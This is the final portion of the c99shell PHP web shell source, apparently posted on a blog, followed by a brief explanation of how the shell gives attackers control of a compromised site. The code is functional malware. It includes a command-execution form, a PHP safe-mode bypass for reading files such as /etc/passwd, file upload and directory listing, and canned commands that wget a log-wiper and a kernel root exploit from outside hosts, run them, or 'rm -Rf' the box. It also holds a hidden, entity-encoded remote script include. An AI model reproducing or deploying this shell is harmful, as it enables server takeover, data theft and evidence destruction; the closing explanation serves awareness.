2821 "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
2822 "RYtMAgEAOw==", 
2823 "ext_cmd"=> 
2824 "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
2825 "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
2826 "dmrYAMn1onq/YKpjvEgAADs=", 
2827 "ext_cpp"=> 
2828 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
2829 "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
2830 "Eq7YrLDE7a4SADs=", 
2831 "ext_ini"=> 
2832 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
2833 "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
2834 "SnEjgPVarHEHgrB43JvszsQEADs=", 
2835 "ext_diz"=> 
2836 "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
2837 "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
2838 "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
2839 "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
2840 "/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
2841 "pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
2842 "dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
2843 "9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
2844 "4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2845 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2846 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2847 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2848 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2849 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2850 "AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
2851 "C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
2852 "2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
2853 "CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
2854 "Ow==", 
2855 "ext_doc"=> 
2856 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
2857 "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
2858 "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
2859 "ext_exe"=> 
2860 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
2861 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
2862 "xhIAOw==", 
2863 "ext_h"=> 
2864 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
2865 "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
2866 "Wq/NknbbSgAAOw==", 
2867 "ext_hpp"=> 
2868 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
2869 "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
2870 "UqUagnbLdZa+YFcCADs=", 
2871 "ext_htaccess"=> 
2872 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
2873 "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
2874 "AAA7", 
2875 "ext_html"=> 
2876 "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
2877 "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
2878 "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
2879 "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
2880 "ADs=", 
2881 "ext_jpg"=> 
2882 "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
2883 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
2884 "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
2885 "FxEAOw==", 
2886 "ext_js"=> 
2887 "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
2888 "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
2889 "a00AjYYBbc/o9HjNniUAADs=", 
2890 "ext_lnk"=> 
2891 "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
2892 "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
2893 "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
2894 "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
2895 "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
2896 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2897 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2898 "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
2899 "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
2900 "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
2901 "ADs=", 
2902 "ext_log"=> 
2903 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
2904 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
2905 "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
2906 "ext_php"=> 
2907 "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
2908 "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
2909 "ext_pl"=> 
2910 "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
2911 "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
2912 "ext_swf"=> 
2913 "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
2914 "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
2915 "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
2916 "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
2917 "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
2918 "ext_tar"=> 
2919 "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
2920 "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
2921 "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
2922 "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
2923 "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2924 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2925 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2926 "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
2927 "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
2928 "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
2929 "u4tLAgEAOw==", 
2930 "ext_txt"=> 
2931 "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
2932 "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
2933 "UpPWG3Ig6Hq/XmRjuZwkAAA7", 
2934 "ext_wri"=> 
2935 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
2936 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
2937 "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
2938 "ext_xml"=> 
2939 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
2940 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
2941 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
2942 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
2943 "IQA7" 
2944 ); 
2945 //For simple size- and speed-optimization. 
2946 $imgequals = array( 
2947   "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
2948   "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
2949   "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
2950   "ext_html"=>array("ext_html","ext_htm"), 
2951   "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
2952   "ext_lnk"=>array("ext_lnk","ext_url"), 
2953   "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
2954   "ext_doc"=>array("ext_doc","ext_dot"), 
2955   "ext_js"=>array("ext_js","ext_vbs"), 
2956   "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
2957   "ext_wri"=>array("ext_wri","ext_rtf"), 
2958   "ext_swf"=>array("ext_swf","ext_fla"), 
2959   "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
2960   "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
2961 ); 
2962 if (!$getall) 
2963 { 
2964   header("Content-type: image/gif"); 
2965   header("Cache-control: public"); 
2966   header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
2967   header("Cache-control: max-age=".(60*60*24*7)); 
2968   header("Last-Modified: ".date("r",filemtime(__FILE__))); 
2969   foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
2970   if (empty($images[$img])) {$img = "small_unk";} 
2971   if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
2972   echo base64_decode($images[$img]); 
2973 } 
2974 else 
2975 { 
2976   foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
2977   natsort($images); 
2978   $k = array_keys($images); 
2979   echo  "<center>"; 
2980   foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
2981   echo "</center>"; 
2982 } 
2983 exit; 
2984 } 
2985 if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
2986 ?> 
2987 </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
2988 <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>::<SCRIPT SRC=&#x68&#x74&#x74&#x70&#x3a&#x2f&#x2f&#x77&#x77&#x77&#x2e&#x6c&#x6f&#x63&#x61&#x6c&#x72&#x6f&#x6f&#x74&#x2e&#x6e&#x65&#x74&#x2f&#x69&#x62&#x6e&#x65&#x6c&#x65&#x72&#x2f&#x79&#x61&#x7a&#x2e&#x6a&#x73></SCRIPT><a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> 
2989 <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
2990 <br> 
2991 <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
2992 <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> </b></a> ::</b></p></td></tr> 
2993 <tr> 
2994   <td width="50%" height="83" valign="top"><center> 
2995     <div align="center">Useful Commands 
2996     </div> 
2997     <form action="<?php echo $surl; ?>"> 
2998       <div align="center"> 
2999         <input type=hidden name=act value="cmd"> 
3000         <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
3001           <SELECT NAME="cmd"> 
3002             <OPTION VALUE="uname -a">Kernel version 
3003               <OPTION VALUE="w">Logged in users 
3004                 <OPTION VALUE="lastlog">Last to connect 
3005                   <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
3006                     <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
3007                     <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
3008                     <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
3009                     <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
3010                     <OPTION VALUE="netstat -atup | grep IST">Open ports 
3011                     <OPTION VALUE="locate gcc">gcc installed? 
3012                     <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
3013                     <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
3014                     <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
3015                     <OPTION VALUE="./zap2">WIPELOGS PT3 
3016                     <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
3017                     <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
3018                     <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
3019                     <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
3020                     <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
3021                     <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
3022                   </SELECT> 
3023         <input type=hidden name="cmd_txt" value="1"> 
3024         &nbsp; 
3025         <input type=submit name=submit value="Execute"> 
3026           <br> 
3027         Warning. Kernel may be alerted using higher levels </div> 
3028     </form> 
3029     </td> 
3030   <td width="50%" height="83" valign="top"><center> 
3031    <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
3032       <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> 
3033       <input type="hidden" name="client" value="firefox-a"> 
3034       <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
3035       <input type="hidden" name="hl" value="en"> 
3036       <input type="hidden" name="hs" value="b7p"> 
3037       <input type=submit name="btnG" VALUE="Search"> 
3038     </form></center> 
3039     </td> 
3040 </tr></TABLE><br> 
3041 <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
3042 <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> </b></a> ::</b></p></td></tr> 
3043 <tr> 
3044   <td width="50%" height="83" valign="top"><center> 
3045     <div align="center">Php Safe-Mode Bypass (Read Files) 
3046     </div><br> 
3047     <form action="<?php echo $surl; ?>"> 
3048       <div align="center"> 
3049       File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
3050       <? 
3051        
3052       function rsg_read() 
3053     {     
3054     $test=""; 
3055     $temp=tempnam($test, "cx"); 
3056     $file=$_GET['file'];     
3057     $get=htmlspecialchars($file); 
3058     echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; 
3059     if(copy("compress.zlib://".$file, $temp)){ 
3060     $fichier = fopen($temp, "r"); 
3061     $action = fread($fichier, filesize($temp)); 
3062     fclose($fichier); 
3063     $source=htmlspecialchars($action); 
3064     echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; 
3065     unlink($temp); 
3066     } else { 
3067     die("<FONT COLOR=\"RED\"><CENTER>Sorry... File 
3068     <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have 
3069     access.</CENTER></FONT>"); 
3070             } 
3071     echo "</div>"; 
3072     } 
3073      
3074     if(isset($_GET['file'])) 
3075 { 
3076 rsg_read(); 
3077 } 
3078      
3079     ?> 
3080      
3081     <? 
3082      
3083     function rsg_glob() 
3084 { 
3085 $chemin=$_GET['directory']; 
3086 $files = glob("$chemin*"); 
3087 echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; 
3088 foreach ($files as $filename) { 
3089     echo "<pre>"; 
3090    echo "$filename\n"; 
3091    echo "</pre>"; 
3092 } 
3093 } 
3094 if(isset($_GET['directory'])) 
3095 { 
3096 rsg_glob(); 
3097 } 
3098 ?> 
3099           <br> 
3100       </div> 
3101     </form> 
3102     </td> 
3103   <td width="50%" height="83" valign="top"><center> 
3104    <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
3105       <div align="center"><br> 
3106       Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
3107     </form></center> 
3108     </td> 
3109 </tr></TABLE><br> 
3110 <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
3111 <tr> 
3112 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
3113 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
3114 </tr> 
3115 </table> 
3116 <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
3117 <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
3118 <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Shadow & Preddy | <a href="http://rootshell-security.net"><font color="#FF0000">RootShell Security Group</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--<br><br> coded & antivirus undetected by <a href=mailto:hamed.bazargani@gmail.com>hamed bazargani</a> <font color=red> (HBA) </font> </b></p></td></tr></table> 
3119 </body></html><?php chdir($lastdir); 
3120 c99shexit();
3121 ?>

About the C99 Shell

Once uploaded, this script creates a new page on the infected website. This page then provides the attacker with remote and unauthorised access to pretty much everything on the server, via a relatively pretty interface.
Here is a screenshot of the c99 shell in action:

C99 shell script screenshot
C99 shell script screenshot

You can also take a look at my non-functional demo c99 script.
As you can see, the script allows the hacker to do all sorts of things, including the following:

  • Traverse directories
  • View/Edit files
  • Download files
  • Delete files
  • Upload files
  • Execute MySql queries / commands
  • Bypass mod_security
  • Alter permissions for directories/folders
  • Execute shell commands

In short, if you end up with one of these on your server – you might as well kiss your site goodbye for the meantime, and hope you have a backup located somewhere other than on the server.